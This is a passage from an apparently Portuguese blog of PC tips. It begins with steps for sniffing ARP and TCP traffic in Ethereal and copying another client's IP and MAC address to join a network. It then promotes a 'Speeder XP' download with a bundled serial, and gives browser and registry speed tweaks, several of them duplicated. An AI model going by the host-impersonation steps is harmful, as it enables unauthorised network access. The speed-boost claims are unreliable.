Abra o arquivo .cap com o e Ethereal e filtre por “arp”, para isso escreva arp na barra superior ao lado de “Filter:”.
Você deverá ver uma tela como essa:
Ordene as informações por “info” penas clicando em info, agora procure algo parecido com essa figura:
Repare que vários “Who has” indicam para o mesmo IP menor que eles, esse IP provavelmente será o Gateway da rede, no nosso exemplo 192.168.2.1.
Parte V: Encontrando o IP e MAC
Agora falta somente IP e MAC para você, filtre por "tcp" na barra superior, escolha um par IP-MAC da lista que aparecer, no nosso exemplo usei o IP 192.168.2.24 e o MAC dele.
Bom, agora só ir no Status da conexão, clicar em propriedades e completar com os dados assim conseguidos.
Parte VI: Obtendo a mascara.
Primeiramente tentamos mascaras de rede tradicionais, como 255.255.0.0; 255.255.255.0; 255.255.240.0
Caso nenhuma destas nos de resultados satisfatórios use uma calculadora de IP, chamada IPcalc, que está disponivel na seção de downloads.
Duplicar/triplicar a taxa de download(testado)!!!!
Duplicar/triplicar a taxa de download(testado)!!!!
Duplicar taxa de download(testado em wireless)
baixem este programa "Speeder XP"
http://rapidshare.com/files/35475327/SpeederXP.rar
dps instale e aplike o serial q ta na pasta
toda vez q abrir o windows e kizer fzr download vc abre ele e coloca na janelinha o nº9555 e clika em apply
xD
se for jogar ou gravar dvd /cd nem use
use apenas para download
Ex:meu bitcomet conectava num determinado torrent à 13/10
apos o uso ele conecta a 60...
Ex2:Meus downs ficavam no navegador na faixa de 35/40 kbps
agora estão à 90
xD
espero ter ajudado!
A unica coisa ruim, eh q ele diminui a capacidade do pc, ele deixa os programas travando, mas pra duplicar o download o q nos naum fazemos
xD
cuidado q ele buga o msn, 1º abara ele dps o msn!
NAO USE ELE MUITO POIS ELE GASTA MUITO A CPU, POR ISSO USE SO PARA DOWNLOAD!!!!!!
Duplicar taxa de download(testado em wireless)
baixem este programa "Speeder XP"
http://rapidshare.com/files/35475327/SpeederXP.rar
dps instale e aplike o serial q ta na pasta
toda vez q abrir o windows e kizer fzr download vc abre ele e coloca na janelinha o nº9555 e clika em apply
xD
se for jogar ou gravar dvd /cd nem use
use apenas para download
Ex:meu bitcomet conectava num determinado torrent à 13/10
apos o uso ele conecta a 60...
Ex2:Meus downs ficavam no navegador na faixa de 35/40 kbps
agora estão à 90
xD
espero ter ajudado!
A unica coisa ruim, eh q ele diminui a capacidade do pc, ele deixa os programas travando, mas pra duplicar o download o q nos naum fazemos
xD
cuidado q ele buga o msn, 1º abara ele dps o msn!
NAO USE ELE MUITO POIS ELE GASTA MUITO A CPU, POR ISSO USE SO PARA DOWNLOAD!!!!!!
Deixando seu Mozilla Firefox MUITO + RÁPIDO...
Deixando seu Mozilla Firefox MUITO + RÁPIDO...
Deixe seu Firefox Mais rápido. Digite no seu navegador about:config e em seguida procure: "Localizar Nome". Agora siga as instruções abaixo:
1. Digite na barra de endereços do seu navegador:
about:config
na barra de endereços e tecle ENTER.
2. Procure pela sequência na caixa "Localizar Nome":
network.http.pipelining
Veja se o valor atrubuído à ela é true. Se não for, dê um duplo clique para mudar para esse valor.
3. Procure pela sequência:
network.http.pipelining.maxrequests
Dê um duplo clique nela e mude o valor para 8.
4. Em:
network.http.proxy.pipelinin
,dê um clique duplo e mude o valor para true.
5. Mude o valor de:
network.dns.disableIPv6
para true.
6. Agora, clique com o botão direito em qualquer valor na tela, e escolha Nova Opção:
Boolean
Dê o nome de:
content.interrupt.parsing
e valor true.
7. Clique com o botão direito em qualquer lugar, escolha Nova Opção:
Inteira
Dê o nome de:
content.max.tokenizing.time
e defina o valor para 2250000.
8. Novamente, crie uma nova entrada Inteira com o nome de:
content.notify.interval
com o valor de 750000.
9. Crie uma entrada Boolean com o nome:
content.notify.ontimer
e defina o valor para true.
10. Crie uma entrada Inteira com o nome de:
content.notify.backoffcoun
e valor 5.
11. Crie uma entrada Inteira com o nome:
content.switch.threshold
com o valor 750000.
12. Crie uma entrada Inteira com o nome:
nglayout.initialpaint.delay
com o valor 0.
13. Reinicie o Firefox e veja a diferença!
Outra DICA...
Todo mundo que usa o FireFox adora ele por dois motivos: velocidade e facilidade.
Mais se vc achava que não tinha como deixar ele mais rápido ainda, se engana
De uma turbinada no seu FireFox com o tutorial abaixo:
1. Digite "about:config" na barra de endereços e dê enter. Use page down até encontrar as seguintes entradas:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normalmente o navegador faz uma requisição para uma página da web a cada vez. Quando você habilita pipelining ele fará várias requisições ao mesmo tempo, o que realmente aumenta a velocidade de carregamento das páginas.
2. Altere as entradas como mostrado a seguir: (dê clique duplo na mesma para alterar o valor)
Coloque "network.http.pipelining" como "true"
Coloque "network.http.proxy.pipelining" como "true"
Coloque "network.http.pipelining.maxrequests" para algum n° igual a 30.
Isso fará com que o navegador efetue 30 requisições ao mesmo tempo. (a minha tá em 100 e ficou uma maravilha)
3. Você vai ver uma bara no topo, e do lado um botão escrito "Localizar", nessa barra escreva qualquer coisa, vai você vai ver que a tela ficou branca.
4. Finalmente de clique na parte branca com o direito do mouse e selecione Nova opção-> Inteira.... (New-> Integer...), coloque o nome "nglayout.initialpaint.delay" (sem aspas) e na outra tela digite o valor "0". Este valor é a quantidade de tempo que o navegador aguarda antes de agir com a informação que ele recebe.
Se Vc quiser Acelerar ainda mais baixe esse arquivo:
http://baixaki.ig.com.br/download/Fasterfox.htm
Deixe seu Firefox Mais rápido. Digite no seu navegador about:config e em seguida procure: "Localizar Nome". Agora siga as instruções abaixo:
1. Digite na barra de endereços do seu navegador:
about:config
na barra de endereços e tecle ENTER.
2. Procure pela sequência na caixa "Localizar Nome":
network.http.pipelining
Veja se o valor atrubuído à ela é true. Se não for, dê um duplo clique para mudar para esse valor.
3. Procure pela sequência:
network.http.pipelining.maxrequests
Dê um duplo clique nela e mude o valor para 8.
4. Em:
network.http.proxy.pipelinin
,dê um clique duplo e mude o valor para true.
5. Mude o valor de:
network.dns.disableIPv6
para true.
6. Agora, clique com o botão direito em qualquer valor na tela, e escolha Nova Opção:
Boolean
Dê o nome de:
content.interrupt.parsing
e valor true.
7. Clique com o botão direito em qualquer lugar, escolha Nova Opção:
Inteira
Dê o nome de:
content.max.tokenizing.time
e defina o valor para 2250000.
8. Novamente, crie uma nova entrada Inteira com o nome de:
content.notify.interval
com o valor de 750000.
9. Crie uma entrada Boolean com o nome:
content.notify.ontimer
e defina o valor para true.
10. Crie uma entrada Inteira com o nome de:
content.notify.backoffcoun
e valor 5.
11. Crie uma entrada Inteira com o nome:
content.switch.threshold
com o valor 750000.
12. Crie uma entrada Inteira com o nome:
nglayout.initialpaint.delay
com o valor 0.
13. Reinicie o Firefox e veja a diferença!
Outra DICA...
Todo mundo que usa o FireFox adora ele por dois motivos: velocidade e facilidade.
Mais se vc achava que não tinha como deixar ele mais rápido ainda, se engana
De uma turbinada no seu FireFox com o tutorial abaixo:
1. Digite "about:config" na barra de endereços e dê enter. Use page down até encontrar as seguintes entradas:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normalmente o navegador faz uma requisição para uma página da web a cada vez. Quando você habilita pipelining ele fará várias requisições ao mesmo tempo, o que realmente aumenta a velocidade de carregamento das páginas.
2. Altere as entradas como mostrado a seguir: (dê clique duplo na mesma para alterar o valor)
Coloque "network.http.pipelining" como "true"
Coloque "network.http.proxy.pipelining" como "true"
Coloque "network.http.pipelining.maxrequests" para algum n° igual a 30.
Isso fará com que o navegador efetue 30 requisições ao mesmo tempo. (a minha tá em 100 e ficou uma maravilha)
3. Você vai ver uma bara no topo, e do lado um botão escrito "Localizar", nessa barra escreva qualquer coisa, vai você vai ver que a tela ficou branca.
4. Finalmente de clique na parte branca com o direito do mouse e selecione Nova opção-> Inteira.... (New-> Integer...), coloque o nome "nglayout.initialpaint.delay" (sem aspas) e na outra tela digite o valor "0". Este valor é a quantidade de tempo que o navegador aguarda antes de agir com a informação que ele recebe.
Se Vc quiser Acelerar ainda mais baixe esse arquivo:
http://baixaki.ig.com.br/download/Fasterfox.htm
Aumentando a velocidade do Download no IE
Aumentando a velocidade do Download no IE
Vá em:
Iniciar > executar > digite "regedit" (sem aspas)
Irá abrir uma "pasta"
ai vc irá navegar em:
HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion >InternetSettings
depois clique em adicionar valor, adicione os valores dword seguintes:
MaxConnectionsPer1_0Server=Dword:0000000a
MaxConnectionsPerServer=Dword:0000000a
OBS? Nem todas as Redes Funciona e não da muita direferença
Vá em:
Iniciar > executar > digite "regedit" (sem aspas)
Irá abrir uma "pasta"
ai vc irá navegar em:
HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion >InternetSettings
depois clique em adicionar valor, adicione os valores dword seguintes:
MaxConnectionsPer1_0Server=Dword:0000000a
MaxConnectionsPerServer=Dword:0000000a
OBS? Nem todas as Redes Funciona e não da muita direferença
MELHORAR A QUALIDADE DO VIDEO DO YOUTUBE
Sabia que podes melhorar a qualidade dos vídeos do Youtube?
Por vezes, os teus vídeos preferidos estão disponíveis com muito baixa qualidade, mas nós ensinamos-te a reduzir o problema.
Através da adição de um código no link do vídeo, podes aumentar a qualidade do mesmo, mas o tempo necessário para carregar o vídeo vai ser superior ao normal, uma espera que ira valer a pena de certeza.
Vamos lá explicar então, usando um vídeo do melhor clube do mundo:
- Versão original: http://www.youtube.com/watch?v=RXnfwh52L-k
- Versão melhorada: http://www.youtube.com/watch?v=RXnfwh52L-k&fmt=18
Basta adicionar &fmt=18 no link do vídeo pretendido e esperar um pouco mais do que o habitual para visualizar com maior qualidade.
Por vezes, os teus vídeos preferidos estão disponíveis com muito baixa qualidade, mas nós ensinamos-te a reduzir o problema.
Através da adição de um código no link do vídeo, podes aumentar a qualidade do mesmo, mas o tempo necessário para carregar o vídeo vai ser superior ao normal, uma espera que ira valer a pena de certeza.
Vamos lá explicar então, usando um vídeo do melhor clube do mundo:
- Versão original: http://www.youtube.com/watch?v=RXnfwh52L-k
- Versão melhorada: http://www.youtube.com/watch?v=RXnfwh52L-k&fmt=18
Basta adicionar &fmt=18 no link do vídeo pretendido e esperar um pouco mais do que o habitual para visualizar com maior qualidade.
Assinar:
Postagens (Atom)